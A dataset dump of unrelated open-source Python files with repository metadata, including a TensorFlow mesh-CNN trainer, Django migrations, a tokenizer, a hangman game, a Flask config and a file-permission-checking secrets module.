exec_and_log(["gindent"]+indent_args+["/tmp/"+cfile])
# compare with expected c file but first format the expected file as well
exec_and_log(["gindent"]+indent_args+[expected_cfile, "-o", "/tmp/expected_"+base+".c"])
exec_and_log(["diff", "/tmp/expected_"+base+".c", "/tmp/"+cfile])
# compare with expected output
exec_and_log(["diff", expected_output, "/tmp/"+base+".txt"])
def tests():
clean()
require(compile)
for file in glob.glob("tests/cs652/j/*.j"):
test(file)
def clean():
rmdir("out")
rmdir("gen")
def all():
tests()
processargs(globals())
| [
"joylinkyizhuo@gmail.com"
] | joylinkyizhuo@gmail.com |
52f26c2206606fbefa691cc6942173f41b6ca058 | 3f2b2c885e81a15ed22b4a781bc2e8f5f264b336 | /mhs/common/mhs_common/messages/envelope.py | 647b5cfc88274a3290b87d36d4fc9f90d8920933 | [
"Apache-2.0"
] | permissive | nhsconnect/prm-deductions-integration-adaptors | 9c947dbca3c5bf22874efb35364cd22b52acd795 | 17c78a2b2df3755736500d8b10f3e09c99263ef2 | refs/heads/deductions | 2021-07-20T11:13:59.339647 | 2020-12-22T09:48:09 | 2020-12-22T09:48:09 | 246,785,891 | 0 | 2 | Apache-2.0 | 2021-04-30T21:57:17 | 2020-03-12T08:50:37 | Python | UTF-8 | Python | false | false | 2,123 | py | """This module defines the base envelope used to wrap messages to be sent to a remote MHS."""
from __future__ import annotations
import abc
import pathlib
from typing import Dict, Tuple, Any
from builder import pystache_message_builder
from definitions import ROOT_DIR
FROM_PARTY_ID = "from_party_id"
TO_PARTY_ID = "to_party_id"
CPA_ID = "cpa_id"
CONVERSATION_ID = 'conversation_id'
SERVICE = "service"
ACTION = "action"
MESSAGE_ID = 'message_id'
TIMESTAMP = 'timestamp'
TO_ASID = 'to_asid'
FROM_ASID = 'from_asid'
RECEIVED_MESSAGE_ID = "received_message_id"
MESSAGE = "hl7_message"
CONTENT_TYPE_HEADER_NAME = "Content-Type"
TEMPLATES_DIR = "data/templates"
class Envelope(abc.ABC):
"""An envelope that contains a message to be sent to a remote MHS."""
def __init__(self, template_file: str, message_dictionary: Dict[str, Any]):
"""Create a new EbxmlEnvelope that populates the specified template file with the provided dictionary.
:param template_file: The template file to populate with values.
:param message_dictionary: The dictionary of values to use when populating the template.
"""
self.message_dictionary = message_dictionary
ebxml_template_dir = str(pathlib.Path(ROOT_DIR) / TEMPLATES_DIR)
self.message_builder = pystache_message_builder.PystacheMessageBuilder(ebxml_template_dir, template_file)
@abc.abstractmethod
def serialize(self) -> Tuple[str, Dict[str, str], str]:
"""Produce a serialised representation of this message.
:return: A tuple of: the message id, headers to send along with the message and the serialized representation
of the message.
"""
pass
@classmethod
@abc.abstractmethod
def from_string(cls, headers: Dict[str, str], message: str) -> Envelope:
"""Parse the provided message string and create an instance of an Envelope.
:param headers A dictionary of headers received with the message.
:param message: The message to be parsed.
:return: An instance of an Envelope constructed from the message.
"""
pass
| [
"noreply@github.com"
] | nhsconnect.noreply@github.com |
2a12c95c893661baca9bef4785d6924789ae87e7 | 50e3d53c47250bca40fbbe49ea6f5979cf3ca807 | /tson/token.py | 46875ebbe66e3600a47e3695f0654d5d388e3a25 | [] | no_license | cstuartroe/tson | 1d85749e16d611dcf653cef4adc944932450db01 | 5485e0b6480150f3535c0ce634d228876dd76ba2 | refs/heads/main | 2023-04-18T12:11:35.751657 | 2021-05-02T18:39:58 | 2021-05-02T18:39:58 | 359,987,026 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,375 | py | import re
import sys
SINGLE_CHAR_ESCAPES = {
'"': '"',
'\\': '\\',
'/': '/',
'b': '\b',
'f': '\f',
'n': '\n',
'r': '\r',
't': '\t'
}
LABEL_RE = "[a-zA-Z_][a-zA-Z0-9_]*"
NUMERIC_RE = r"-?[0-9]+(\.[0-9]+)?"
BOOLS = {
"true": True,
"false": False,
}
DECLARERS = {
"type",
"let",
}
class Token:
LABEL = "LABEL"
NUMBER = "NUMBER"
BOOL = "BOOL"
STRING = "STRING"
DECLARER = "DECLARER"
NULL = "null"
UNDEFINED = "undefined"
def __init__(self, line_no, col_no, line, s, ttype, value):
self.line_no = line_no
self.col_no = col_no
self.line = line
self.s = s
self.ttype = ttype
self.value = value
def raise_error(self, message):
print(f"Line {self.line_no}, column {self.col_no}")
print(self.line)
print(' '*self.line_no + '^' + '~' * (len(self.s) - 1))
print(message)
sys.exit()
def __repr__(self):
return f"Token(line_no={self.line_no+1}, col_no={self.col_no+1}, s={repr(self.s)}, ttype={repr(self.ttype)}, value={repr(self.value)})"
@staticmethod
def resolve_symbol(s):
if s in BOOLS:
return BOOLS[s], Token.BOOL
elif s in DECLARERS:
return s, Token.DECLARER
elif s in KEYWORDS:
return None, s
else:
return s, Token.LABEL
KEYWORDS = {
"let",
"type",
"import",
"export",
Token.NULL,
Token.UNDEFINED
}
class Tokenizer:
def __init__(self, lines):
self.lines = lines
def tokens(self):
self.line_no = 0
self.col_no = 0
self.pass_whitespace()
while not self.eof():
yield self.grab_token()
def eof(self):
return self.line_no == len(self.lines) - 1 and self.eol()
def eol(self):
return self.col_no == len(self.current_line())
def newline(self):
self.line_no += 1
self.col_no = 0
def current_line(self):
return self.lines[self.line_no]
def rest(self):
return self.current_line()[self.col_no:]
def next(self, i=1):
return self.current_line()[self.col_no:min(self.col_no+i, len(self.current_line()))]
def pass_whitespace(self):
while True:
if self.eof():
break
elif self.eol():
self.newline()
elif self.next() in ' \t\r\n':
self.col_no += 1
else:
break
def grab_token(self):
line_no = self.line_no
col_no = self.col_no
line = self.current_line()
label = re.match(LABEL_RE, self.rest())
number = re.match(NUMERIC_RE, self.rest())
if number:
s = number.group()
val = int(s)
ttype = Token.NUMBER
self.col_no += len(s)
elif label:
s = label.group()
val, ttype = Token.resolve_symbol(s)
self.col_no += len(s)
# TODO: strings
else:
s = self.next()
val = None
ttype = s
self.col_no += 1
self.pass_whitespace()
return Token(
line_no=line_no,
col_no=col_no,
line=line,
s=s,
value=val,
ttype=ttype,
)
| [
"cstuartroe@haverford.edu"
] | cstuartroe@haverford.edu |
efb465ae45ed7fa2b00ca94106f0b6d33d05e6bd | 135f624cf8c2d95eff09a07397da44c8e76d1a70 | /src/tasks/migrations/0003_auto_20170206_1153.py | 8c2bbb6235854c056f563c00840d7cc4929eb512 | [] | no_license | uk-gov-mirror/datagovuk.publish_data_alpha | 42709ffdf1e3ccedf6c5c742078fda5fc9522712 | 4cbafff4311da0693d456953d01b24f27101e41f | refs/heads/master | 2021-06-17T23:05:50.835551 | 2017-05-25T15:00:27 | 2017-05-25T15:00:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-02-06 11:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0002_task_related_object_id'),
]
operations = [
migrations.AlterField(
model_name='task',
name='related_object_id',
field=models.CharField(blank=True, max_length=38, null=True),
),
]
| [
"ross@servercode.co.uk"
] | ross@servercode.co.uk |
329cb04ae1cab3aabc343c4547ca8dd288675bbc | 18fbcdfac031a73cb3292c1adec69dc368069639 | /anondolok_library/user_panel/migrations/0009_alter_appointments_requested_time.py | e3f20490985068a9ffb56c9e0b986563e3e84007 | [
"MIT"
] | permissive | Horraira/anondolokLibrary | 69ad35da75a53f977724c93d4da1f70980d2a587 | f80a9f1b620235136bec0794a67882f4cb420d50 | refs/heads/main | 2023-07-25T17:49:19.826806 | 2021-09-06T09:23:22 | 2021-09-06T09:23:22 | 403,559,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | # Generated by Django 3.2.1 on 2021-07-08 10:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_panel', '0008_alter_appointments_requested_time'),
]
operations = [
migrations.AlterField(
model_name='appointments',
name='requested_time',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
| [
"sohan@inflexionpointbd.com"
] | sohan@inflexionpointbd.com |
7542f89e0cfc9b04e094048503a3ff6926a4561b | cf445784420af485e8cc6e571346a10a2e604520 | /PFCNN/PFCNN.py | 4d994a3ae8cbd8c0b30ebd7f14fe7000d93fedc2 | [
"MIT"
] | permissive | whuhxb/pfcnn | d829416c3aeb1eadf4f7d79d1ec7d480622d1804 | ae8530efeb795e50495dc1758ced61b0d02a677f | refs/heads/master | 2023-04-02T04:43:50.642344 | 2021-03-31T04:17:28 | 2021-03-31T04:17:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,443 | py | from tqdm import tqdm
import tensorflow as tf
import os
class PFCNN:
def __init__(self, parse_function, network, flags):
self.parse_function = parse_function
self.network = network
self.flags = flags
def parse_dataset(self, dataset_path):
dataset = tf.data.TFRecordDataset(dataset_path)
dataset = dataset.map(self.parse_function, num_parallel_calls=4)
dataset = dataset.repeat()
iterator = dataset.make_one_shot_iterator()
return iterator.get_next()
def build_dataset(self):
self.train_data = self.parse_dataset(self.flags.tfrecord_path + self.flags.train_data)
self.test_data = self.parse_dataset(self.flags.tfrecord_path + self.flags.test_data)
def build_graph(self):
self.build_dataset()
self.train_output = self.network(self.train_data, self.flags.G_num, self.flags.level_num, self.flags.conv_shape, self.flags.class_num, reuse=False, is_point_feature=self.flags.is_point_feature, feature_channel=self.flags.feature_channel, drop_out=self.flags.drop_out)
self.test_output = self.network(self.test_data, self.flags.G_num, self.flags.level_num, self.flags.conv_shape, self.flags.class_num, reuse=True, is_point_feature=self.flags.is_point_feature, feature_channel=self.flags.feature_channel, drop_out=0)
self.train_vars = tf.trainable_variables()
self.lossL2 = tf.add_n([ tf.nn.l2_loss(v) for v in self.train_vars]) / len(self.train_vars) * 1e-4
self.total_loss = self.train_output['loss'] + self.lossL2
self.saver=tf.train.Saver(max_to_keep=5)
self.best_saver = tf.train.Saver(max_to_keep=3)
self.learning_rate = tf.placeholder(dtype=tf.float32, name="learning_rate")
self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.total_loss)
def build_summary(self):
L2_loss_summary = tf.summary.scalar('L2_Regular', self.lossL2)
total_loss_summary = tf.summary.scalar('TotalLoss', self.total_loss)
train_loss_summary = tf.summary.scalar('training_loss', self.train_output['loss'])
self.merged_train_summ = tf.summary.merge([L2_loss_summary, total_loss_summary, train_loss_summary])
self.train_set_accuracy = tf.placeholder(dtype=tf.float32, name="train_set_accuracy")
self.train_acc_summary = tf.summary.scalar('train_epoch_accuracy', self.train_set_accuracy)
test_loss_summary = tf.summary.scalar('testing_loss', self.test_output['loss'])
self.test_set_accuracy = tf.placeholder(dtype=tf.float32, name="test_set_accuracy")
self.test_acc_summary = tf.summary.scalar('test_epoch_accuracy', self.test_set_accuracy)
self.merged_test_summ = tf.summary.merge([test_loss_summary])
def train(self):
config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
with tf.Session(config=config) as sess:
start_epoch = 0
init = tf.global_variables_initializer()
sess.run(init)
if(self.flags.is_load_model):
self.saver.restore(sess, self.flags.model_path)
start_epoch = self.flags.start_epoch
print(self.flags.model_path)
print("load model success!")
train_writer = tf.summary.FileWriter(self.flags.summaries_dir + '/train', sess.graph)
test_writer = tf.summary.FileWriter(self.flags.summaries_dir + '/test')
best_acc = 0
if not os.path.exists(self.flags.summaries_dir+'/ckpt'):
os.mkdir(self.flags.summaries_dir+'/ckpt')
if not os.path.exists(self.flags.summaries_dir+'/pred'):
os.mkdir(self.flags.summaries_dir+'/pred')
os.mkdir(self.flags.summaries_dir+'/logits')
lr = self.flags.learning_rate
for epoch_i in tqdm(range(start_epoch, start_epoch + self.flags.epoch_num)):
if(epoch_i > 0 and epoch_i % self.flags.decay_epoch == 0 and lr>=1e-4):
lr = lr / 2
print("\nepoch " + str(epoch_i) + " training:")
print("learning rate: "+ str(lr))
train_acc_sum = 0.0
for iter_j in range(self.flags.train_size):
training_output, merged_sum, _ = sess.run([self.train_output, self.merged_train_summ, self.train_step], feed_dict={self.learning_rate: lr})
train_writer.add_summary(merged_sum, iter_j + self.flags.train_size * epoch_i)
train_acc_sum = train_acc_sum + training_output['accuracy'].sum() / len(training_output['accuracy'])
print("epoch " + str(epoch_i) + " training acc:" + str(train_acc_sum / self.flags.train_size) + "\n")
train_ave_acc = sess.run(self.train_acc_summary, feed_dict={self.train_set_accuracy: train_acc_sum / self.flags.train_size})
train_writer.add_summary(train_ave_acc, epoch_i)
test_acc_sum = 0.0
for iter_j in range(self.flags.test_size):
testing_output, test_summary = sess.run([self.test_output, self.merged_test_summ])
test_writer.add_summary(test_summary, iter_j + self.flags.test_size * epoch_i)
test_acc_sum = test_acc_sum + testing_output['accuracy'].sum() / len(testing_output['accuracy'])
print("epoch " + str(epoch_i) + " testing acc:" + str(test_acc_sum / self.flags.test_size) + "\n")
test_ave_acc = sess.run(self.test_acc_summary, feed_dict={self.test_set_accuracy: test_acc_sum / self.flags.test_size})
test_writer.add_summary(test_ave_acc, epoch_i)
if(test_acc_sum / self.flags.test_size >= best_acc):
best_acc = test_acc_sum / self.flags.test_size
self.best_saver.save(sess, self.flags.summaries_dir+'/ckpt/' + self.flags.task + '_best.ckpt', global_step=epoch_i)
if(epoch_i % self.flags.save_epoch == 0):
self.saver.save(sess, self.flags.summaries_dir+'/ckpt/' + self.flags.task + '.ckpt' , global_step=epoch_i)
def test(self):
with tf.Session() as sess:
self.saver.restore(sess, self.flags.model_path)
print(self.flags.model_path)
print("load model success!")
train_acc_sum = 0.0
for iter_j in range(self.flags.train_size):
training_output = sess.run(self.train_output)
train_acc_sum += training_output['accuracy'].sum() / len(training_output['accuracy'])
print("training acc:" + str(train_acc_sum / self.flags.train_size) + "\n")
test_acc_sum = 0.0
for iter_j in range(self.flags.test_size):
testing_output = sess.run(self.test_output)
#np.savetxt(self.flags.summaries_dir+"/"+testing_output['name'].decode()+".txt", testing_output['predicted'], fmt="%d", delimiter="\n")
#np.savetxt(self.flags.summaries_dir+"/"+testing_output['name'].decode()+"_max.txt", testing_output['logits'], fmt="%.6f", delimiter="\n")
print(testing_output['name'].decode(), testing_output['accuracy'])
test_acc_sum = test_acc_sum + testing_output['accuracy'].sum() / len(testing_output['accuracy'])
print("testing acc:" + str(test_acc_sum / self.flags.test_size) + "\n")
| [
"v-yuqyan@microsoft.com"
] | v-yuqyan@microsoft.com |
47690046374fd174a6070576ac7812e7f43c6e1c | 3fb64f353604cd9e95d1bbda41c0692b246d806a | /hangman.py | 8face6e91cfe52b447bacd154bf7fedce7827e75 | [] | no_license | jamesthomaskerr/Lab9 | 4fe6e927dd900d5e6beaaff789ce523c5e6265e2 | daf4dc92400a6e338cc2dd5b7269f55b3455c861 | refs/heads/master | 2021-01-10T10:34:09.416257 | 2015-10-23T11:39:26 | 2015-10-23T11:39:26 | 44,809,636 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | __author__ = 'James'
import random
def genRandomWord():
list_of_words = ["python", "jumble", "easy", "difficult", "answer", "xylophone"]
#word = random.choice(list_of_words)
word="difficult"
return word
def createCurrentBlank(word):
currentBlanks = len(word) * "_"
return currentBlanks
def printCurrentBlanks(currentBlanks):
for i in range(0,len(currentBlanks)):
print(currentBlanks[i],end=' ')
def guessALetter():
letter=input("Guess a letter: ")
return letter
def goodGuess(letter,word):
#returns true if letter is in word otherwise return false
match=False
for i in range(len(word)):
if word[i]==letter:
match=True
return match
def updateCurrentBlanks(letter,word,currentBlanks):
# check word for letter and replace blanks in currentBlacks with any matches
wordlist=list(word)
for i in range(len(wordlist)):
if letter == wordlist[i]:
currentBlanks = currentBlanks[:i] + wordlist[i] + currentBlanks[i+1:]
return currentBlanks
def printRules():
print('rules!')
def printLives(currentLives):
print(currentLives)
def main():
printRules()
word = genRandomWord()
currentBlanks = createCurrentBlank(word)
printCurrentBlanks(currentBlanks)
currentLives = 10
while currentLives > 0 and word != currentBlanks:
letter = guessALetter()
lastGuessGood = goodGuess(letter,word)
if lastGuessGood:
currentBlanks = updateCurrentBlanks(letter,word,currentBlanks)
else:
currentLives = currentLives - 1
printCurrentBlanks(currentBlanks)
printLives(currentLives)
main() | [
"jamesthomaskerr@gmail.com"
] | jamesthomaskerr@gmail.com |
249dd977b023e9bafd9974cc4cd185410ae66435 | d3154515510c47520164b48246021645b58d3652 | /aether-kernel/aether/kernel/api/migrations/0109_export_task.py | 2d21a17de506f5d6d6d0a68a2a974902d7a891d6 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | eHealthAfrica/aether | 391f675a0b85a78cd22391763d37343622696f97 | 2a4bf1b78d1bcb207af51dc06c6393ad78fe0291 | refs/heads/develop | 2023-05-25T11:56:37.971814 | 2023-03-31T07:37:07 | 2023-03-31T07:37:07 | 110,524,187 | 17 | 6 | Apache-2.0 | 2023-05-23T05:54:39 | 2017-11-13T08:59:49 | Python | UTF-8 | Python | false | false | 4,564 | py | # Generated by Django 2.2.7 on 2019-12-04 09:17
import aether.kernel.api.models
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import django_prometheus.models
import model_utils.fields
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('kernel', '0108_submission_is_extracted'),
]
operations = [
migrations.AlterField(
model_name='attachment',
name='md5sum',
field=models.CharField(blank=True, editable=False, max_length=36, verbose_name='file MD5'),
),
migrations.CreateModel(
name='ExportTask',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(editable=False, verbose_name='name')),
('settings', django.contrib.postgres.fields.jsonb.JSONField(default=dict, editable=False, verbose_name='settings')),
('status_records', models.CharField(blank=True, editable=False, null=True, max_length=20, verbose_name='status records')),
('error_records', models.TextField(blank=True, editable=False, null=True, verbose_name='error records')),
('status_attachments', models.CharField(blank=True, editable=False, null=True, max_length=20, verbose_name='status attachments')),
('error_attachments', models.TextField(blank=True, editable=False, null=True, verbose_name='error attachments')),
('created_by', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='tasks', to=settings.AUTH_USER_MODEL, verbose_name='Requested by')),
('project', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='tasks', to='kernel.Project', verbose_name='project')),
],
options={
'verbose_name': 'task',
'verbose_name_plural': 'tasks',
'ordering': ['project__id', '-modified'],
'default_related_name': 'tasks',
},
),
migrations.CreateModel(
name='ExportTaskFile',
fields=[
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(verbose_name='name')),
('file', models.FileField(editable=False, max_length=500, upload_to=aether.kernel.api.models.__task_path__, verbose_name='file')),
('md5sum', models.CharField(blank=True, editable=False, max_length=36, verbose_name='file MD5')),
('size', models.DecimalField(decimal_places=0, default=0, editable=False, max_digits=19, verbose_name='file size')),
('task', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='files', to='kernel.ExportTask', verbose_name='task')),
],
options={
'verbose_name': 'export file',
'verbose_name_plural': 'export files',
'ordering': ['task__id', 'name'],
'default_related_name': 'files',
},
),
migrations.AddIndex(
model_name='exporttaskfile',
index=models.Index(fields=['task', 'name'], name='kernel_expo_task_id_440af6_idx'),
),
migrations.AddIndex(
model_name='exporttask',
index=models.Index(fields=['project', '-modified'], name='kernel_expo_project_e19d66_idx'),
),
migrations.AddIndex(
model_name='exporttask',
index=models.Index(fields=['-modified'], name='kernel_expo_modifie_9b8dbe_idx'),
),
]
| [
"noreply@github.com"
] | eHealthAfrica.noreply@github.com |
9dc41bfe4a4c7783a9ec0d0b7eb8117aceae3978 | 946b7b64ee9eb1511f11890b3c69cf903d2982aa | /Course_03/Regular Expressions/analysis02.py | 464d833656003cf41089e8f37ae6f05f2ad652b3 | [] | no_license | srimani-programmer/Python-Specialization | 41342def0dab0c6641163f1e35cb1c9668a900a3 | 9a2a081549934ba2ce0f8b98edb3f27f5f880b59 | refs/heads/master | 2020-06-27T19:14:37.491119 | 2020-03-31T09:32:50 | 2020-03-31T09:32:50 | 200,027,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | import re
file_handle = open('mbox-test.txt')
# Printing the data starts with 'x'
count = 0
for data in file_handle:
lines = data.strip()
if re.search('^X.*:',lines):
# print(data)
count += 1
print(count)
file_handle.close() | [
"srimani.scholar@gmail.com"
] | srimani.scholar@gmail.com |
69c33361e23d0f8fc4c52f7b4df56e7d4a39a560 | bf591c979a30f3bcd07e91abe312a9de3fdc5595 | /config.py | ac06c1782e7734a2894a728da4cb9108388c8dc1 | [] | no_license | isayahc/flask_google_login | ef3e4f0fb071bbd5b6d4d5dbc6b680ff1750dae8 | fa2aeee34be8f7d2bf08fd8ff92df4ce4aa549e7 | refs/heads/main | 2023-01-07T17:38:46.159760 | 2020-11-09T19:39:21 | 2020-11-09T19:39:21 | 307,735,352 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,264 | py | """Flask configuration variables."""
# This is where you can change env
from os import environ, path
from dotenv import load_dotenv
basedir = path.abspath(path.dirname(__file__))
load_dotenv(path.join(basedir, ".env")) # use for different .envs
class Config:
"""Set Flask configuration from .env file."""
# General Config
SECRET_KEY = environ.get("SECRET_KEY")
FLASK_APP = environ.get("FLASK_APP")
FLASK_ENV = environ.get("FLASK_ENV")
# Database
SQLALCHEMY_DATABASE_URI = environ.get("SQLALCHEMY_DATABASE_URI")
SQLALCHEMY_ECHO = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
# Google API
GOOGLE_CLIENT_ID = environ.get("GOOGLE_CLIENT_ID")
GOOGLE_CLIENT_SECRET = environ.get("GOOGLE_CLIENT_SECRET")
class ProductionConfig(Config):
"""Set Flask configuration from .env file."""
# General Config
SECRET_KEY = environ.get("SECRET_KEY")
FLASK_APP = environ.get("FLASK_APP")
FLASK_ENV = environ.get("FLASK_ENV")
# Database
SQLALCHEMY_DATABASE_URI = environ.get("DATABASE_URL")
SQLALCHEMY_ECHO = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
# Google API
GOOGLE_CLIENT_ID = environ.get("GOOGLE_CLIENT_ID")
GOOGLE_CLIENT_SECRET = environ.get("GOOGLE_CLIENT_SECRET") | [
"isayahculbertson@gmail.com"
] | isayahculbertson@gmail.com |
29b5c3375aed49657686d4504ec68efa264fc82a | ca8b97d9b8e91c17dfacc8996002c387ee7dc6dd | /classfunction.py | e2404a46ff5f3f8cbbf506de40668194fd203420 | [] | no_license | sankaranarayanankj/python | 943404c49b26876890a2dbff550ad718dfe942dc | d5f3c3b6998f7e99cc8af0444ff67d7328804f9e | refs/heads/master | 2020-06-22T10:20:17.663186 | 2020-06-14T16:06:31 | 2020-06-14T16:06:31 | 197,697,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | class Employee:
def __init__(self):
self.emp_id=int(input("ID:"))
self.emp_name=(input("Name:"))
self.emp_des=(input("Desigination:"))
self.emp_sal=int(input("Salary:"))
def category(self):
if(self.emp_sal>=25000):
self.cat=" Class A"
elif(self.emp_sal>=20000 and self.emp_sal<=25000):
self.cat=" Class B"
elif(self.emp_sal>=15000 and self.emp_sal<=20000):
self.cat="Class C"
else:
self.cat="Class D"
obj.display_details()
def display_details(self):
print(self.emp_id,"<-->",self.emp_name,"<-->",self.emp_des,"<-->",self.emp_sal,"<-->",self.cat)
l=[]
x=int(input("Enter number of employees:"))
for i in range(x):
obj=Employee()
l.append(obj)
print("Dict---->",Employee.__dict__)
| [
"noreply@github.com"
] | sankaranarayanankj.noreply@github.com |
4e68987fe34097d952c5eba566bb259a07655076 | 2892731203f7b59faa8f5182b756c0b3575e796f | /cma/assim_secrets.py | c485a566344992c2d1fe735ef00077e3a91aa5c3 | [] | no_license | assimilation/assimilation-official | 1024b92badcbaf6b7c42f01f52e71c926a4b65f8 | 9ac993317c6501cb1e1cf09025f43dbe1d015035 | refs/heads/rel_2_dev | 2023-05-10T20:12:33.935123 | 2022-12-08T16:21:22 | 2022-12-08T16:21:22 | 42,373,046 | 52 | 17 | null | 2023-08-16T12:43:49 | 2015-09-12T21:04:36 | Python | UTF-8 | Python | false | false | 15,557 | py | #!/usr/bin/env python
# coding=utf-8
#
# vim: smartindent tabstop=4 shiftwidth=4 expandtab number colorcolumn=100
#
# This file is part of the Assimilation Project.
#
# Author: Alan Robertson <alanr@unix.sh>
# Copyright (C) 2017 - Assimilation Systems Limited
#
# Free support is available from the Assimilation Project community
# - http://assimproj.org
# Paid support may be available from Assimilation Systems Limited
# - http://assimilationsystems.com
#
# The Assimilation software is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The Assimilation software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the Assimilation Project software.
# If not, see http://www.gnu.org/licenses/
"""
This file provides secret management for the Assimilation project.
"""
import stat
import os.path
import pwd
import grp
import json
from AssimCtypes import CRYPTKEYDIR
class AssimSecret(object):
"""
This class is for providing secrets for the Assimilation code.
These things include credentials for Neo4j, and other credentials the software might need to
do its work.
"""
secret_subclasses = {}
_secret_info_map = {}
def __init__(self, secret_name, secret_parameters):
"""
Base class initialization for the AssimSecret base class
:param secret_name: str: the name of this secret
:param secret_parameters: list(str): - parameters for this subclass initializer
"""
self.secret_name = secret_name
self._secret_parameters = secret_parameters
self._update_functions = []
@classmethod
def register(cls, subclass):
"""
Register this class as a subclass of AssimSecret - used as a decorator
:param subclass: class: The subclass of AssimSecret we want to register as a constructor
:return: the constructed object
"""
assert issubclass(subclass, cls)
cls.secret_subclasses[subclass.__name__.lower()] = subclass
return subclass
@staticmethod
def factory(secret_name, **keywords):
"""
Implements the factory pattern for our secret types
:param secret_name: str: name of the secret we want to instantiate
:return: AssimSecret: (actually a subclass of AssimSecret)
"""
secret_info = AssimSecret._secret_info_map[secret_name]
secret_type = secret_info.get("type", "file").lower()
if secret_type not in AssimSecret.secret_subclasses:
secret_type += "secret"
return AssimSecret.secret_subclasses[secret_type](secret_name, secret_info, **keywords)
def get(self):
"""
Retrieve the value of our secret
:return: Union(str, bytes)
"""
raise NotImplementedError("%s.get() is an abstract method" % self.__class__.__name__)
def set(self, new_value):
"""
Update the value of our secret
:param new_value: The new value to set the secret to.
:return: None
"""
raise NotImplementedError("%s.set() is an abstract method" % self.__class__.__name__)
def add_update_function(self, update_function):
"""
Add a new update function to an AssimSecret object.
:param update_function: callable(secret_name, secret_parameters): function to add
:return: None
"""
self._update_functions.append(update_function)
def _perform_external_update(self):
"""
Utility function to perform all corresponding external updates when a secret is
(about to be) updated. This is intended to do things like propagate such a
change to Neo4j or other secret owners.
These functions are supplied through _add_update_function.
:return: bool: True if the external update process succeeded.
"""
if self._update_functions:
for fun in self._update_functions:
if not fun(self.secret_name, self._secret_parameters):
return False
else:
return True
@staticmethod
def set_secret_info_map(info_map):
"""
Set the secret info map for our secrets classes
:param info_map: dict(str: dict)
:return: None
"""
for secret_name in info_map:
parameters = info_map[secret_name]
if "type" not in parameters:
raise ValueError(
"Secret %s has no secret type in secret information map." % secret_name
)
if parameters["type"].lower() not in AssimSecret.secret_subclasses:
secret_type = parameters["type"].lower() + "secret"
if secret_type not in AssimSecret.secret_subclasses:
raise ValueError(
"Secret %s has an invalid secret type [%s] in secret information map."
% (secret_name, parameters["type"])
)
# Must be OK - or at least no egregious errors ;-)
AssimSecret._secret_info_map = info_map
@staticmethod
def set_secret_info_map_filename(file_name):
"""
Set our secret map info from a JSON-structured filename
:param file_name: Name of the file to read the JSON secret map from
:return: None
"""
with open(file_name) as map_fd:
AssimSecret.set_secret_info_map(json.loads(map_fd.read()))
@AssimSecret.register
class FileSecret(AssimSecret):
"""
A subclass for storing secrets in files
"""
DEFAULT_SECRET_DIR = CRYPTKEYDIR
uids = set()
gids = set()
def __init__(self, secret_name, secret_parameters):
"""
:param secret_name: str: name of this secret
:param secret_parameters: parameters for this secret
"""
AssimSecret.__init__(self, secret_name, secret_parameters)
self._temp_ok = secret_parameters.get("temp_ok", False)
@staticmethod
def set_uids_and_gids(uids=None, gids=None):
"""
Set the globally permissible set of user ids and group ids for files
that we check the permissions of
:param uids: a list of user ids - either numeric or strings
:param gids: a list of group ids - either numeric or strings
:return:
"""
FileSecret.uids = FileSecret.make_uids(uids) if uids else set()
FileSecret.gids = FileSecret.make_gids(gids) if gids else set()
print("UIDS: %s" % FileSecret.uids)
@staticmethod
def _check_full_path_permissions(file_name, file_read_only=True, temp_ok=False):
"""
Validate the file permissions of the file and all its parent directories.
:param file_name: str: name of the file we want to check the permissions of
:return: None
:raises: OSError: If permissions look wrong
"""
FileSecret._check_path_perms(file_name, read_only=file_read_only, temp_ok=temp_ok)
read_only = file_read_only
while True:
FileSecret._check_path_perms(file_name, read_only=read_only)
read_only = False
parent = os.path.dirname(file_name)
if parent == "" or parent == file_name:
break
file_name = parent
@staticmethod
def _check_path_perms(path_name, read_only=True, temp_ok=False):
"""
Check the permissions of this particular pathname
We enforce the following rules:
Must not be writable by group or other
if read_only: Must not be readable by group or other
